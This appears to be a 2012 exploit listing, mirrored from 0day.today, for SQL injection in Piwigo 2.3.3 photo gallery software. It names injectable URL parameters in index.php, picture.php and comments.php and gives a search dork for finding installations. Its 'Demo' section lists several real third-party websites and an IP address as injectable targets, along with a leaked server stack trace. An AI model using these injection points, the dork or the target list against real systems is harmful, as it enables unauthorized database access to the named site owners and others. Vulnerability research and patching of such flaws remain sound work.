piwigo v.2.3.3 SQL Injector

🗓️ 04 Mar 2012 00:00:00Reported by TeaM MosTaType

zdt🔗 0day.today👁 31 Views

piwigo v.2.3.3 SQL Injector TeaM MosTa 26-02-2012 Windows 7 B-T.

+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : piwigo <== SQL Injector
# Date          : 26-02-2012
# Author        : TeaM MosTa
# Version       : 2.3.3
# Dork          : "Propulsé par Piwigo"
# Tested on     : Window 7 , B-T.5
# Greetz        : milw0rm 1337day.com
+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[ Exploit by TeaM MosTa ]--------------------------------------------------+
Exploit
http://127.0.0.1/piwigo/index.php?/category/1" <===> {SQL}
comments.php?display_mode=albums  <===> {SQL}
#1    my_error /home/fanslyon/public_html/piwigo/include/functions.inc.php(637)
#2    pwg_query /home/fanslyon/public_html/piwigo/include/functions.inc.php(1275)
#3    hash_from_query /home/fanslyon/public_html/piwigo/include/functions_category.inc.php(393)
#4    get_cat_id_from_permalinks /home/fanslyon/public_html/piwigo/include/functions_url.inc.php(483)
#5    parse_section_url /home/fanslyon/public_html/piwigo/include/section_init.inc.php(123)
#6    include /home/fanslyon/public_html/piwigo/index.php(27)
Demo :
http://www.fanslyon.com/piwigo/index.php?/category/53' {SQL}
http://endlersman.paysages-aquatiques.com/archivphoto/piwigo/picture.php?/194/categories%22{SQL}
http://endlersman.paysages-aquatiques.com/archivphoto/piwigo/index.php?/category/53%27{SQL}
http://88.191.128.71/piwigo/piwigo/picture.php?/194/categories%22{SQL}
http://photos.ugtg.org/picture.php?/194/categories%22{SQL}
http://www.nature-granville-chausey.com/picture.php?/40/category/4%22
http://tedybear.fr/piwigo/index.php?/category/194%22

+----------------------------------------------------------------------------------------------------------------------------------+
TnKs To :
[# Ked Ans | 1337day.com Inj3ct0r Exploit DataBase | Original MosTa | TrOoN | HacKer_Fire |#]
[# Kàràm Eddiñé BiLàmi | security-ray | Exploit-Db | metasploit | backtrack| walid_rires|#]
[#Mail: [email protected] #]



#  0day.today [2018-03-13]  #

04 Mar 2012 00:00Current

7.1High risk

Vulners AI Score7.1

piwigo sql injector team mosta 26-02-2012 windows 7 b-t.5 exploit 0day.today 1337day.com security-ray metasploit backtrack fanslyon paysages-aquatiques.com categories 194 40 53 photos.ugtg.org nature-granville-chausey.com tedybear.fr 88.191.128.71 endlersman.paysages-aquatiques.com sql index.php picture.php piwigo categories%22 categories%27 categories%22{sql} index.php%3f category/1 comments.php?display_mode=albums my_error pwg_query hash_from_query get_cat_id_from_permalinks parse_section_url include demo greetz original mosta troon hacker_fire kàràm eddiñé bilàmi exploit-db walid_rires 1337day.com inj3ct0r exploit database mail [email protected]